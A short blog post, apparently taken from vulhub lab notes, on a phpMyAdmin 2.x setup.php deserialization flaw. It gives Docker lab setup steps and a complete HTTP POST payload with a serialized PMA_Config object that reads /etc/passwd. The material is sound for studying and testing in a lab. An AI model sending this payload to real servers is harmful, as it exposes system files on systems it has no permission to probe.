WooYun-2016-199433

Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)

Affected version:2.x

Setup

cd vulhub/phpmyadmin/WooYun-2016-199433
docker-compose up -d

Visit http://10.10.10.8:8080 and you will see the phpmyadmin home page.Because there is no connection to the database,we will get an error.But this vulnerability is not related to the database,so just ignore.

Exploit

POST /scripts/setup.php HTTP/1.1
Host: 10.10.10.8:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

img

posted @   kalixcn  阅读(13)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
历史上的今天:
2023-05-23 Linux启动过程
点击右上角即可分享
微信分享提示